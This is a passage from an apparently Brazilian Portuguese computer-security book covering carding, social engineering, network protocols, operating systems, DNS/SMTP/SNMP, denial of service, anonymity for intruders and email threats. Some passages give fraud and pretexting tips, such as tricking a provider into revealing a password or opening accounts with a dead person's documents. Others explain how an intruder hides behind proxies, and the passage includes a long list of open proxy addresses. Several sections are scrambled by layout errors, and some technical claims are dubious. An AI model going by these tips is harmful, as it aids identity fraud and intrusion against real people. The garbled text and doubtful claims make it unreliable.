E quando fazem compra os carders vão buscá-las na própria firma ou mandam entregar em um endereço falso como uma casa alugada só para isso.
No capítulo 5 este assunto é tratado de uma forma mais prática.
Daí vêem a importância do bom administrador para a segurança da rede. E com certeza ele é sempre alvo e muitas
criticas.
1.8 Trapaceando para descobrir informações É uma prática muito usada, quando você quer descobrir uma
senha, você liga para o provedor e diz que esqueceu sua senha, provavelmente o suporte já cansado e sem muita vontade logo lhe informará. Desta mesma forma pode ser após descobrir a documentação de uma pessoa abrir contas virtuais, assinar provedores e até pedir um telefone. Claro que pode dar confusão, mas e se o dono da documentação for um defunto? Ou ele morar lá no ceara e você no rio de janeiro? É obvio que o estelionatário não trará muitos problemas.
Se quiser o endereço de uma pessoa é muito fácil vá até a companhia telefônica e peça a segunda via da conta do fulano de tal, bom na hora eles já te entregam sem pedir documentos e você já terá o endereço da pessoa.
E isso também acontece em empresas aéreas. Enfim usando a esperteza é muito fácil descobrir certas
informações.
Terrorismo Tecnológico Aprenda Para Sobreviver
68
Vemos então como estamos vulneráveis a sermos descobertos, até mesmo por ladrões, seqüestradores...
Pelo site das empresas de telefonia se colocarmos o nome da pessoa e a cidade, ele nos traz então o endereço completo e o telefone.
Cuidado então!
Terrorismo Tecnológico Aprenda Para Sobreviver
69
_________________________Extra
Vamos entender mais sobre protocolos?
Protocolo é um conjunto de regras compartilhado sobre o
gerenciamento do fluxo de informações, que interagindo com as camadas mais baixas da rede tem como finalidade garantir o intercâmbio de informações ordenado e sem erros. Por viajarem em pacotes, protocolos diferentes podem ser empilhados em várias camadas na rede. Chamados isso de pilha de protocolos.
Os protocolos mais usados em locais são:
IPX/SPX: Baseado num conjunto criado pela Xerox chamado XNS. Padrão nas populares redes Novell Netware, o IPX/SPX, ou simplesmente IPX, também são robustos e muito seguros, porém menos complexos, e por isso indicados para redes locais.
NetBIOS: Criado pela IBM, é um protocolo simples e rápido.
Mesmo não tendo a complexibilidade e segurança de seus irmãos maiores o NetBIOS pode ser usado sem problemas em pequenas e médias redes locais.
NetBeui: Significa Network Basic End User Interface. Ele
suporta pequenas LAN’s é rápido e simples. Porém, tem uma estrutura arquitetônica inerente que limita sua eficiência à medida que a rede se expande. O protocolo netbios apenas deverá ser instalado caso haja a necessidade de comunicação com redes antigas (LAN manager).
Apple Talk: Desenvolvido pela Apple Computer para redes de
computadores padrão Macintosh. Por ser proprietário, seu uso também é restrito somente a redes com este tipo de computador.
Terrorismo Tecnológico Aprenda Para Sobreviver
70
TCP/IP: Com raízes no Departamento de Defesa Norte-
Americano, o TCP/IP é o protocolo usado na Internet e o mais usado no mundo hoje. O TCP/IP foi projetado para interligar computadores à distância, por isso é robusto, confiável e seguro. Embora possa ser utilizado sem problemas em LANs, sua complexibilidade sugere que seu uso seja voltado para as WANs.
SNA: Desenvolvido pela IBM para seus computadores de
grande e médio porte seu uso está restrito somente a esta área.
Veja a seguinte tabela!
Aplicativo netbios IPX/SPX TCP/IP Integrar com NetWare
X
Conectar a Internet X Trabalhar com UNIX X Roteamento (WAN) X Rede grande X Rede pequena X X X
Terrorismo Tecnológico Aprenda Para Sobreviver
71
Capítulo II Sistemas Operacionais - Neste capítulo será tratado as
influencias que um determinado sistema operacional influi na hora do ataque, e se existe um sistema operacional mais seguro do que o outro.
Terrorismo Tecnológico Aprenda Para Sobreviver
72
Sabemos que todos os computadores possuem sistemas operacionais, e os computadores de bordo não são diferentes. Para se comunicar com algum software seja banco de dados, e-mail, protocolos ou qualquer outro dispositivo é necessário que nesta máquina esteja instalado um S.O. (Sistema Operacional).
Sabia que muitos televisores, ar condicionado, secador de roupa, microondas possui um sistema operacional, sendo este geralmente o UNIX?
2.1 Windows X Unix
Tanto o Unix quanto o Windows trabalham com multi-tarefas. As várias versões de cada S.O., como (Debiam Linux, Guarani,
Windows 98, Windows XP e muitos outros.). O Windows possui uma larga vantagem sobre os outros
sistemas operacionais inclusive o Unix e seus derivados. Esta vantagem é na parte de usuários e pequenos técnicos e a facilidade e simplicidade de usar os recursos já que eles são em formatos de “janelas” o que facilita a visualização e é muito fácil de instalar programas, drivers, e inclusive o próprio sistema operacional, que praticamente se instala sozinho usando a tecnologia plug and play.
Muito importante também é que praticamente todos os softwares encontrados no mercado são para plataforma Windows.
Na plataforma Unix têm: - Distribuição gratuita (como é o caso do Linux), não requer
pagarmos fortunas com o sistema operacional e nem com suas atualizações.
Terrorismo Tecnológico Aprenda Para Sobreviver
73
- Criptografia inquebrável de senhas. - Melhores ferramentas de rede como gerenciamento de portas. - Melhor gerenciamento de permissões - Código-fonte aberto
2.2 Vantagens do UNIX
A grande vantagem é que ele tem o código-fonte aberto (open-source). Isso significa que junto com o SO e programas, vem o seu código fonte e você pode alterá-lo, saber exatamente o que esta sendo executado e como funciona.
Já que temos o código fonte pode-se então fazer a sua própria versão do sistema operacional, fazendo com que ele execute e haja exatamente como o programador queira.
Desvantagens Unix Um problema do Unix é que ele é um tanto complicado para
usuários comuns o utilizarem sendo que muitas de suas funções somente são acessadas via linha de comando.
O SO é gratuito, mas os aplicativos que são feitos por encomendas estão cada vez mais ficando absurdamente caros.
Para instalar e configurar a plataforma também tem que se ter um especialista. E para os usuários tem que de dar um curso para trabalhar com o sistema.
Terrorismo Tecnológico Aprenda Para Sobreviver
74
Desvantagens do Windows O SO e muitos dos seus aplicativos como o Office custam uma
fortuna. Quando você compra um software eles lançam um mais novo e
melhor. Tanto o Windows como o Unix inesperadamente uma vez ou
outra travam sem motivo.
2.3 Configurações mal planejadas e erradas
Contas padrões do sistema, serviços desnecessários ativos (portas), erros em permissões de arquivos e muitas senhas padrão ou de senhas como data de nascimento, são ainda as maiores falhas por causa de descuido. As contas padrões são perigosas, pois qualquer pessoa que já tenha utilizado um sistema Server as conhece. No do Unix contas como bin e admin já vêm com senhas padrões de acesso ao sistema. Assim como no Windows também têm algumas como convidados. Desabilite-as ou mude as senhas. Quanto aos serviços e portas, se não estiver utilizando-as desabilite-as.
Usar também uma proteção em que devidos IPs e usuários não possam acessar determinados dados e softwares. Essas permissões são muito importantes e devem ser utilizadas. Somente com senha esses dados poderão ser acessados, usados, copiados e apagados.
Terrorismo Tecnológico Aprenda Para Sobreviver
75
2.4 Ataques restritos a um tipo de sistema
Para Windows existem milhões de vírus e trojans, já para o Unix estes praticamente não existem.
Já o Unix tem falhas como no sendmail já no Windows o sendmail funciona perfeitamente.
Ma hoje é muito fácil de se encontrar em páginas hacker (é só procurar em www.google.com.br) programas específicos como trojans para linux, trojans para Windows, vírus, scanners, sniffers....
2.5 O que é DNS, SMTP, SNMP? (Entenda Mais)
2.5.1 O que é DNS?
O DNS (Domain Name System) é um esquema de gerenciamento de nomes, hierárquico e distribuído. O DNS define a sintaxe dos nomes usados na Internet, regras para delegação de autoridade na definição de nomes, um banco de dados distribuído que associa nomes a atributos (entre eles o endereço IP) e um algoritmo distribuído para mapear nomes em endereços. O DNS e especificado nas RFCs 882, 883 e 973. As aplicações normalmente utilizam um endereço IP de 32 bits no sentido de abrir uma conexão ou enviar um datagrama IP. Entretanto, os usuários preferem identificar as máquinas através de nomes ao invés de números. Assim é necessário um banco de dados que permita a uma aplicação encontrar um endereço, dado que ela
Terrorismo Tecnológico Aprenda Para Sobreviver
76
conhece o nome da máquina com a qual se deseja comunicar. Um conjunto de servidores de nomes mantém o banco de dados com os nomes e endereços das máquinas conectadas a Internet. Na realidade este e apenas um tipo de informação armazenada no domain system (sistema de domínios). Note que e usado um conjunto de servidores interconectados, ao invés de um único servidor centralizado. Há atualmente tantas instituições conectadas a Internet que seria impraticável exigir que elas notifiquem uma autoridade central toda vez que uma máquina é instalada ou troque de lugar. Assim, a autoridade para atribuição de nomes e delegada à instituições individuais. Os servidores de nome formam uma arvore, correspondendo a estrutura institucional. Os nomes também adotam uma estrutura similar. Um exemplo típico é o nome segurança.xxx.br Para encontrar seu endereço Internet, pode ser necessário o acesso a ate quatro servidores de nomes. Inicialmente deve ser consultado um servidor central, denominado servidor raiz, para descobrir onde esta o servidor br. O servidor br é o responsável pela gerencia dos nomes das instituições/empresas brasileiras ligadas a Internet. O servidor raiz informa como resultado da consulta o endereço IP de vários servidores de nome para o nível br (pode existir mais de um servidor de nomes em cada nível, para garantir a continuidade da operação quando um deles para de funcionar). Um servidor do nível br pode então ser consultado, devolvendo o endereço IP do servidor xxx. De posse do endereço de um servidor xxx e possível solicitar que ele informe o endereço de um servidor jxh, quando, finalmente, pode-se consultar o servidor jxh sobre o endereço da máquina chupeta. O resultado final da busca é o endereço Internet correspondente ao nome segurança.jxh.xxx.br Cada um dos níveis percorridos e referenciado como sendo um domínio. O nome completo segurança.jxh.xxx.br é um nome de domínio. Na maioria dos casos, não é necessário ter acesso a todos os domínios de um nome para encontrar o endereço correspondente, pois os servidores de nome muitas vezes possuem informações sobre mais de um nível de domínio o que elimina uma ou mais consultas. Alem disso, as aplicações normalmente têm acesso ao DNS através de um processo local (servidor para as aplicações e
Terrorismo Tecnológico Aprenda Para Sobreviver
77
um cliente DNS), que pode ser implementado de modo a guardar os últimos acessos feitos, e assim resolver a consulta em nível local. Essa abordagem de acesso através de um processo local simplifica e otimiza a tarefa das aplicações no que tange ao mapeamento de nomes em endereços, uma vez que elimina a necessidade de implementar, em todas as aplicações que fazem uso do DNS, o algoritmo de caminhamento na arvore de domínios descrito anteriormente. O DNS não se limita a manter e gerenciar endereços da Internet. Cada nome de domínio e um nó em um banco de dados, que pode conter registros definindo várias propriedades. Por exemplo, o tipo da máquina e a lista de serviços fornecidos por ela. O DNS permite que seja definido um aliás (nome alternativo) para o no. Também e possível utilizar o DNS para armazenar informações sobre usuários, listas de distribuição ou outros objetos. O DNS é particularmente importante para o sistema de correio eletrônico. No DNS são definidos registros que identificam a máquina que manipula as correspondências relativas a um dado nome, identificado assim onde um determinado usuário recebe suas correspondências. O DNS pode ser usado também para definição de listas para distribuição de correspondências
2.5.2 O que é SMTP?
O SMTP (Simple Mail Transfer Protocol) é o protocolo usado no sistema de correio eletrônico na arquitetura Internet TCP/IP. Um usuário, ao desejar enviar uma mensagem, utiliza o módulo interface com o usuário para compor a mensagem e solicita ao sistema de correio eletrônico que a entregue ao destinatário. Quando recebe a mensagem do usuário, o sistema de correio eletrônico armazena uma copia da mensagem em seu spool (área do dispositivo de armazenamento), junto com o horário do armazenamento e a identificação do remetente e do destinatário. A
Terrorismo Tecnológico Aprenda Para Sobreviver
78
transferência da mensagem é executada por um processo em background, permitindo que o usuário remetente, após entregar a mensagem ao sistema de correio eletrônico, possa executar outras aplicações. O processo de transferência de mensagens, executando em background, mapeia o nome da máquina de destino em seu endereço IP, e tenta estabelecer uma conexão TCP com o servidor de correio eletrônico da máquina de destino. Note que o processo de transferência atua como cliente do servidor do correio eletrônico. Se a conexão for estabelecida, o cliente envia uma cópia da mensagem para o servidor, que a armazena em seu spool. Caso a mensagem seja transferida com sucesso, o servidor avisa ao cliente que recebeu e armazenou uma copia da mensagem. Quando recebe a confirmação do recebimento e armazenamento, o cliente retira a copia da mensagem que mantinha em seu spool local. Se a mensagem, por algum motivo, não for transmitida com sucesso, o cliente anota o horário da tentativa e suspende sua execução. Periodicamente o cliente acorda e verifica se existem mensagens a serem enviadas na área de spool e tenta transmiti-las. Se uma mensagem não for enviada por um período, por exemplo, de dois dias, o serviço de correio eletrônico devolve a mensagem ao remetente, informando que não conseguiu transmiti-la. Em geral, quando um usuário se conecta ao sistema, o sistema de correio eletrônico e ativado para verificar se existem mensagens na caixa postal do usuário. Se existirem, o sistema de correio eletrônico emite um aviso para o usuário que, quando achar conveniente, ativa o módulo de interface com o usuário para receber as correspondências. Uma mensagem SMTP divide-se em duas partes: cabeçalho e corpo, separados por uma linha em branco. No cabeçalho são especificadas as informações necessárias para a transferência da mensagem. O cabeçalho e composto por linhas, que contem uma palavra-chave seguida de um valor. Por exemplo, identificação do remetente (palavra-chave "to:" seguida do seu endereço), identificação do destinatário, assunto da mensagem, etc... No corpo são transportadas às informações da mensagem propriamente dita. O formato do texto e livre e as mensagens são transferidos no formato texto. Os
Terrorismo Tecnológico Aprenda Para Sobreviver
79
usuários do sistema de correio eletrônico são localizados através de um par de identificadores. Um deles especifica o nome da máquina de destino e o outro identifica caixa postal do usuário. Um remetente pode enviar simultaneamente varias cópias de uma mensagem, para diferentes destinatários utilizando o conceito de lista de distribuição (um nome que identifica um grupo de usuários). O formato dos endereços SMTP e o seguinte: nome_local@nome_do_dominio onde o nome_do_dominio identifica o domínio ao qual a máquina de destino pertence (esse endereço deve identificar um grupo de máquinas gerenciado por um servidor de correio eletrônico). O nome local identifica a caixa postal do destinatário. O SMTP especifica como o sistema de correio eletrônico transfere mensagens de uma máquina para outra. O módulo interface com usuário e a forma como as mensagens são armazenadas não são definidos pelo SMTP. O sistema de correio eletrônico pode também ser utilizado por processos de aplicação para transmitir mensagens contendo textos.
2.5.3 O que é SNMP?
O sistema de gerenciamento de rede da arquitetura Internet TCP/IP opera na camada de aplicação e baseia-se no protocolo SNMP (Simple Network Management Protocol). Os padrões que definem a estrutura de gerenciamento de redes Internet são descritos nos documentos RFC-1155 (Structure Of Management Information), RFC-1156 (Management Information Base) e RFC-1157 (Simples Network Management Protocol). Como no esquema de gerenciamento OSI, os processos que implementam as funções de gerenciamento Internet atuam como agentes ou gerentes. Os agentes coletam junto aos objetos gerenciadas as informações recolhidas pelos clientes, com o objetivo de detectar a presença de falhas no funcionamento dos componentes da rede (hosts,
Terrorismo Tecnológico Aprenda Para Sobreviver
80
gateways, processos executando os protocolos de comunicação, etc...), para que possam ser tomadas providencias no sentido de contornar os problemas que ocorrem como conseqüência das falhas. Um objeto gerenciado representa um recurso que pode ser um sistema hospedeiro (estação de trabalho, servidor de terminais, etc...), um gateway ou um equipamento de transmissão (modem, pontes, concentradores, etc...). Cada objeto gerenciado e visto como uma coleção de variáveis cujo valor pode ser lido ou alterado. O gerente envia comandos aos agentes, solicitando uma leitura no valor das variáveis dos objetos gerenciados (get e response), ou modificando seu valor (put). A modificação do valor de uma variável pode ser usada para disparar indiretamente a execução de operações nos recursos associados aos objetos gerenciados (por exemplo, umas reiniciarão). Na troca de informações entre o gerente e o agente, são aplicados mecanismos de autenticação para evitar que usuários não autorizados interfiram no funcionamento da rede. A troca de mensagens entre o gerente e o agente é definida pelo protocolo SNMP. O SNMP define o formato e a ordem que deve ser seguida no intercambio de informações de gerenciamento. As informações sobre os objetos gerenciados são armazenados na MIB (Management Information Base), que contem informações sobre o funcionamento dos hosts, dos gateways, e dos processos que executam os protocolos de comunicação (IP, TCP, ARP,...). A MIB e especificada em ASN.1. O funcionamento do SNMP baseia-se na troca de operações que permitem que o gerente solicite que o agente lhe informe, ou modifique, o valor de uma variável de um objeto na MIB. O SNMP define também uma operação (trap), que permite que um agente informe ao gerente a ocorrência de um evento especifico. Com o objetivo de permitir o uso do esquema de gerenciamento OSI em redes que adotam a arquitetura Internet TCP/IP, foi definido o protocolo de gerenciamento CMOT (CMIP Over TCP/IP). O CMOT utiliza o serviço CMIS (Common Management Information Service) e o protocolo CMIP (Common Management Information Protocol) funcionando sobre uma conexão TCP/IP. O CMTU e descrito na RFC-1095. Alexandre Lopes -------------------- Mensagem editada por Tira Acentos 1.00 -
Terrorismo Tecnológico Aprenda Para Sobreviver
81
Diabolik Dreamz Soft, 1995 MLº Alguém teria algum artigo em português sobre o que é ºDNS em um servidor, ou ate mesmo uma explicação de forma simples para ºque serve o DNS, sei somente que ele faz troca de nome por número. É exatamente isso. Você da um nome pra ele e ele fala o endereço IP (números) correspondente aquele nome. Pra que serve isso? Pacotes IP têm de ser endereçados por números, mas é extremamente incomodo pra seres humanos decorar números. A solução foi usar um serviço que fizesse a tradução de um para outro. Quando você faz uma conexão com www.shareware.com o seu browser faz uma conexão com um servidor DNS pedindo o endereço IP correspondente à string "www.shareware.com". O DNS tenta resolver isso localmente, mas se não conseguir propaga a consulta pra outros servidores DNS ate conseguir (ou não) a resposta, e então retorna o endereço pro browser que continua a conexão. Os nomes no estilo aaa.bbbbbb.cc.dddd.e são conseqüência da estrutura hierárquica usada na distribuição dos nomes, e essa estrutura é usada pra melhorar a eficiência na busca.
2.6 Ataques Universais
São ataques que trabalham no nível de protocolo (para saber mais leia sobre modelo OSI da ISO), como o IP Spoof, com ele, pode ser acessada qualquer máquina independente do sistema operacional ali instalado. Não importa então o S.O. do invasor e do invadido. Mesmo que for, por exemplo, Linux e Novell, Windows VMS ou outro Unix.
O que acontece é que o protocolo TCP/IP é universal, isto é esse protocolo roda em qualquer sistema operacional exatamente para poder fazer a troca de informações.
Este protocolo faz uma conversão para que no outro sistema ao converter estes dados consiga entendê-los.
Terrorismo Tecnológico Aprenda Para Sobreviver
82
Agora como todos os SO conseguem trabalhar desta forma “com esta conectividade” pode-se usar isto para atacá-los, não importando qual plataforma esta rodando localmente.
Extra
Ataque por recusa de serviço
Este é o Denial of Service (DOS) ou Recusa de serviço.
Esse ataque consiste em enviar a máquina alvo com dezenas ou centenas de pacotes de informação, fazendo com que esta não consiga processar a todos os pacotes e consuma toda a sua memória, com isso a máquina trava, pois não consegue executar mais nenhuma tarefa. Porém esse ataque apenas causa danos temporários, como fazer esse servidor parar por alguns momentos e não fornecer os seus serviços.
Claro que isso faz o administrador ficar irritado, mas é só reiniciar o sistema e tudo estará de volta ao normal.
Mas não rouba e nem vê nada ali instalado. Este ataque pode ser usado para retirar um site do ar, um bom
exemplo é o ataque se foi planejado para retirar do ar o site www.windowsupdate.com, mas a Microsoft antes de sofrer o ataque absurdamente o retirou do ar, estranho pois parece que ficaram com medo só ataque. Isto aconteceu dia 16-08-2003.com o ataque do vírus worm Blaster
Terrorismo Tecnológico Aprenda Para Sobreviver
83
Capítulo III Anonimidade – Claro que um invasor não irá querer ser
descoberto e aí entra a parte de se camuflar, despistar, enfim fazer ninguém descobrir quem invadiu o sistema.
Terrorismo Tecnológico Aprenda Para Sobreviver
84
3.1 Anonimidade O ato de ficar anônimo na Internet ou em qualquer lugar serve
exatamente para não ser descoberto, provavelmente por que o que o anônimo está fazendo é algo proibido ou ele quer se passar por outra pessoa.
As formas geralmente usadas são um Shell invadido, um Proxy ou uma pessoa infectada por um trajam.
Com tudo isso pode invadir o sistema sem ser pego ou mandar e-mails anonimamente.
Geralmente ele se conecta através de contas falsas, Cyber Cafés, com números de documentos forjados ou roubados.
Ficar totalmente indetectável, e não ser pego por nenhum
agente é uma coisa muito fácil de ser feita. E não é preciso de nenhum software mágico e sim de alguns conhecimentos. Tudo é feito fazendo uma espécie de roteamento. Antes de invadir uma máquina em São Paulo esse invasor se conecta a Finlândia e a partir de lá ele se conecta em São Paulo.
Nem por um super segurança em informática ele será pego.
3.2 Proxy (O Proxy é o que dá ao invasor o melhor resultado!)
O Proxy, é na verdade, uma ponte entre um servidor e um
cliente. Quando se faz à conexão há um Proxy tudo o que você entra
pela Internet antes de fazer ou ser pedido ao site desejado é feito ao Proxy, este, por sua vez, refaz o pedido ao site desejado. O site responde ao Proxy e ele agora vê para quem é o conteúdo e envia de volta ao invasor.
Terrorismo Tecnológico Aprenda Para Sobreviver
85
Por isso não da para saber o endereço de quem está invadindo, pois o Proxy refez todo o pedido com suas informações (IP) e não com as informações do invasor.
Simplesmente é usado um Proxy1 anônimo que é facilmente
achado na Internet.
Para uma maior compreensão abaixo está à demonstração de como todo o processo é feito.
Após ter o endereço deste “roteador”, entre no Painel de
Controles – Propriedades da Internet. - Clique em conexão - Em servidor de Proxy ative-o. Digamos que o endereço do
servidor que você conseguiu seja: 200.202.202.1:8080 Este é um endereço fictício não sei se ele funciona, e nem sei
se alguém o utiliza ou se ele existe. - O Endereço então será: 200.202.202.1 - E a porá será: 8080 Depois é só clicar em OK e pronto já estará anônimo. A imagem a seguir mostra como é feito no Windows XP. Para
fazer a configuração, o usuário já tem que estar conectado. 1 Uma lista de Proxy anônimo geralmente é pega pelo invasor em http://www.multiproxy.org/txt_anon/proxy.txt
Terrorismo Tecnológico Aprenda Para Sobreviver
86
3.3 Usando o anonymizer
mo é um servidor Proxy se o Administrador do site ou um sis
Este é um serviço gratuito2 na Internet, visitando a sua
HomePage (www.anonymizer.com) ele possibilita que você digite algum endereço e seja redirecionado por ele até a página desejada.
E cotema invadido for consultar os logs de quem o visitou verá o log
do anonymizer e não o do invasor.
2 O serviço gratuito somente o deixa usar o http para usar ftp e outros devem ser pagos.
Terrorismo Tecnológico Aprenda Para Sobreviver
87
3.4 Remailers
O Remailer serve para enviar e-mails anonimamente. Com ele não é preciso se conectar a um servidor SMTP para fazer o envio, o próprio remailer já é um servipode ser usado o wing to mais garantido. Mas caso o invasor tiver enviado um monte de e-mails para inundar uma caixa posta real revelado.
Existem o ls, IP Spoof, Non-blind spoof e Blind arei cada um, pois são menos utilizados, pois os.
A questão é que n método que o invasor vai usar para ficar a e deve ter uma boa defesa para ele não c is depois de feito será muito difícil p
y
194.muja.pitt.washdctt.dsl.att.net:80
customer-148-223-48-114.uninet.net.mx:80
bpubl007.hgo.se:3128 w
AStra fr:80
dor anônimo. Mas como precaução ate, pois com ele é mui
l pode ter o seu IP
utras maneiras como por Shells, Outdia spoof, não explic
é gurá-lmuito difícil confi
ão importa qual será o nô snimo, mas sim que
o onseguir invadir, pegá-lo.
3.5 Lista de Prox
164.58.28.250:80
web.khi.is:80
163.24.133.117:80 164.58.18.25:80
bpubl014.hgo.se:3128
ww.reprokopia.se:8000193.188.95.146:8080 193.220.32.246:80
sbourg-201-2-1-26.abo.wanadoo.gennet.gennet.ee:80
Terrorismo Tecnológico Aprenda Para Sobreviver
88
pandora.teimes.gr:8080 mail.theweb.co.uk:8000 mail.theweb.co.uk:8888
ntbkp.naltec.co.il:8080 195.103.8.10:8080
server.sztmargitgimi.sulinet.hu:80
lvsweb.lasvegasstock.com:8000 musalemnt.notariamusalem.cl:80
ip-36-018.guate.net.gt:80
ntserver1.comnt.com.br:80 200-204-182-137.terra.com.br:80
isdn 80 isdn :80 isdn0 r:80
adao.dei.unicap.br:80 gateway.andromaco.cl:80
p75-90.cmet.net:8080 jaamsa.com:3128
host031210.ciudad.com.ar:80 host071052.arnet.net.ar:8000
202.104.189.20:8080
194.6.1.219:80 194.79.113.83:8080
pools1-31.adsl.nordnet.fr:80 pools1-98.adsl.nordnet.fr:80
195.167.64.193:80
los.micros.com.pl:80 195.47.14.193:80
mail.voltex.co.za:8080 196.23.147.34:80 196.40.43.34:80
200.135.246.2:80
200.21.225.82:8080 200.211.98.5:80
02201.cultura.com.br:02204.cultura.com.br3021.cultura.com.b
mail.care.org.gt:80
200.46.109.82:80 200.52.4.82:80
correo.cfired.org.ar:80 200.61.6.50:8080
202.103.6.178:3128
Terrorismo Tecnológico Aprenda Para Sobreviver
89
202.104.20.181:80 202.105.138.19:8080
202.106.139.88:80
202.99.225.45:8080
aworkla :3128
203.200.75.165:80
203.69.244.194:80
h209-17-147-1.gtconnect.net:80
cr20 :80
210.204.118.194:8080
210.82.40.243:8080
202.105.230.226:80
202.108.122.38:80 202.110.204.18:80 202.110.220.14:80
mail.jjs.or.id:80 cair.res.in:80
smtp2.info.com.ph:80 202.9.136.40:8080
203.113.34.239:80 203.117.67.122:8080 203.123.240.112:80
proxy.nida.ac.th:8080 203.151.40.4:80
203.155.16.130:80 203.155.172.60:80
n003105.netvigator.comesjv.com.hk:80
cp.chollian.net:80 yuluma.wa.edu.au:80
223-mail.internet.ve:8080 mail.bravocorp.com:8080
206.49.33.250:8080 207.61.38.67:8000
209.47.38.116:8000 98859123.cable.net.comail.unisol.com.ar:80
210.12.86.181:80
210.21.93.141:3128 210.219.227.52:8080 210.242.164.150:80
210.8.92.2:80
Terrorismo Tecnológico Aprenda Para Sobreviver
90
210.92.128.194:8080 210.96.65.4:80
host2110 co.jp:80 www :80
211.21.111.227:8080
211.45.21.165:8080 dns1.daiken-c.co.jp:80
TK212017066196.teleweb.at:80
adslb-98-18.cytanet.com.cy:80
adsl-216-158-25-110.cust.oldcity.dca.net:80 norm :80
216-238- .net:80
217-127-24 d.es:3128
host217-34-153 orld.com:8080 host217-34-19 world.com:80
host217-37-205 orld.com:8080
00070226.kagaku-k..kan-shoku.co.jp
ns.toyoriko.co.jp:80 211.114.116.60:80 211.165.192.8:80
211.233.21.166:8080
dns.lpgc.or.jp:80 211.93.108.113:8080 212.12.157.130:8000
enteleca-2.dsl.easynet.co.uk:80
212.251.36.62:80
212.38.132.122:80 212.60.65.206:8080
is2.isys.no:8000 213.121.248.138:80 213.16.133.130:80 213.176.28.6:80
acode-u.org:8080 213.25.170.98:8080
213.25.29.12:80 p038-30.netc.pt:80
xirus.com:8080
andintransit.com112-40.dsl.ct.thebiz216.72.196.21:80 216.72.63.198:80
216.72.63.198:8080 8-37.uc.nombres.tt
217.153.114.66:8080 -161.in-addr.btopenw4-49.in-addr.btopen
-177.in-addr.btopenw
Terrorismo Tecnológico Aprenda Para Sobreviver
91
host182-44.p ness.it:8000
h0040f6a4e0 i.com:8080
cm61-15 .hk:80
adsl-63-192-134 acbell.net:8080 ftp.aparizona.com:80
64-132-153-94.gen.twtelecom.net:8000
AS7000_1B.sfn.co.jp:8080 ns.cyberlinks-jp.com:80
210.163.167.162:80
204.196.104.27:80
mertennt.merten.hu:80 61.142.169.98:80
ns.proserv.co.jp:80 www.nisshin-syouji.co.jp:80
202.9.136.40:80 210.254.8.52:8000 www.qdh.or.jp:80
207.167.236.137:80 210.74.254.35:80
ool21758.interbusihost162-51.pool21759.interbusiness.it:80
217.66.203.82:3128 218.5.133.146:80
2.magicbird.co.jp:80 19.ne.client2.attb4.22.156.10:80 61.11.26.150:80
61.131.48.219:80 61.133.63.129:80
61.138.130.229:8080 -14-187.hkcable.com61.159.224.11:80
61.159.235.36:8080 61.180.73.66:8080 61.185.255.4:3128 61.32.11.130:8080 www.flab.fr:8080 -107.dsl.snfc21.p
ensait19.ensait.fr:80 ado.com.mx:80
211.15.62.123:8000
h64-5-220-82.gtcust.grouptelecom.net:80
ftp.orange.uk.com:8000 maq241i.advance.com.ar:80
Terrorismo Tecnológico Aprenda Para Sobreviver
92
219.163.108.18:8080 mail.koibuchi.ac.jp:80 dns1.koibuchi.ac.jp:80
Para uma melhor consulta de proxys ativos consulte:
http://www.multiproxy.org/txt_anon/proxy.txt
Terrorismo Tecnológico Aprenda Para Sobreviver
93
Capítulo IV
E-mails - Neste capítulo será discutido os problemas enfrentados com os e-mails, sendo estes um grande causador de problemas, e o serviço de troca de mensagens, cartas, documentos e arquivos mais utilizados na Internet.
Terrorismo Tecnológico Aprenda Para Sobreviver
94
4.1 Encarando problemas com E-Mail
Um grande problema que vem assustando programadores, usuários e administradores são os vírus transmitidos por correntes em arquivos anexos ou camuflados.
Esses podem agir em arquivos de sistemas, executáveis, dll, banco de dados... Podem também vir com um trojan embutido. Este por sua vez abrirá um quina infectada, e esta ficará aberta para possíveis ataques.
Es
sconfigurando ou embaral
a porta na má
tes ataques podem ser roubo de informações, fazer um desvio de trafego (assim tudo que chegar e for enviado desta máquina passará por outra e esta por sua vez será uma máquina espiã) ou serem vírus destrutivos, apagando de
hando informações úteis do sistema ou informações do usuário (banco de dados, arquivos etc).
A forma de se combater é ter uma máquina com um ótimo antivírus que analise a cada e-mail que chegue. Porém, nem sempre o antivírus terá no seu banco de dados o vírus, então uma boa política de segurança é imprescindível.
4.2 Spam
Spam na verdade são mensagens mandadas em série, isto é são aqueles e-mails que o pentelho de um amigo seu fica te repassando, como piadas, mensagens, textos...
Há também sites que após um cadastro, ficam mandando noticias, previsões de tempo, anúncios de compra e venda entre
Terrorismo Tecnológico Aprenda Para Sobreviver
95
outros. Até parece interessante durante alguns dias, mas logo você não vai mais ter interesse e só servirá para lotar sua caixa de e-mails.
problema é bem mais grave do que se pensa, já que junto ao e-mail poderá vir um vírus ou um trojan. Uma vez aberto este e-ma
, você pode bloquear os e-mails, estes podem ser a partir de de
are que você utiliza para ver as suas correspondências (geralmente todos softwares de e-mail possuem está função). Ou então pela própria página prestadora de serviços de e-mail como o bol, globo.com, H
viços de Spam são utilizados para este, o e-mail bomba consiste no envio de muitos e-mails em um tempo mu
Não há muito que fazer neste caso a não ser usar o antivírus e se a máquina travar reiniciá-la e após isso apagar este e-mail.
4.4 Remetente falso ou anônimo
O
il o computador estará infectado. Então, desde já, instale um bom antivírus que proteja não só a máquina, mas que também cheque todos os e-mails recebidos e enviados.
Para parar de receber as correspondências de Spam
terminados conteúdos ou de um determinado usuário. Para bloquear você pode utilizar uma opção no Outlook ou no softw
otmail etc.
4.3 E-Mail Bomba
Às vezes até ser
ito rápido, ou pode ser um e-mail que se reproduz, assim quando o usuário o abrir ele se multiplicará, o sistema provavelmente vai ficar superlotado e a máquina vai travar.
Terrorismo Tecnológico Aprenda Para Sobreviver
96
O serviço de SMTP3 não requer uma autenticidade, então qualquer um pode mandar um e-mail dizendo que é qualquer pessoa. Você pode mandar um e-mail dizendo que é o presidente de alguma empresa, ou algum distribuidor, enfim pode se dizer que é qualquer um.
Daí vem à necessidade de uma marca d´agua nos e-mails mais importantes, ou uma assinatura eletrônica, para comprovar a autenticidade dos e-mails, esses por sua vez muito frágeis a falsificações.
4.5 E-mails com arquivos auto executáveis
pefuO maticamente. Só que este software pode ser um vírus ou um trojan.
Existem alguns programas como o MIME que faz que um queno software se auto execute e instale no sistema, ele
nciona como alguns programas como algumas versões do utlook, que ao receber uma foto ele a abre auto
Utilize antivírus e análise de onde vem cada e-mail.
4.6 Alerta
3 SMTP - é um protocolo destinado a fazer o envio das mensagens de e-mail. Ele se encarrega de enviar as mensagens até o servidor. Ele não requer senhas por isso é tão fácil de falsificá-lo.
Terrorismo Tecnológico Aprenda Para Sobreviver
97
O PROCON/SP E A ABRANET ALERTAM: CUIDADO COM
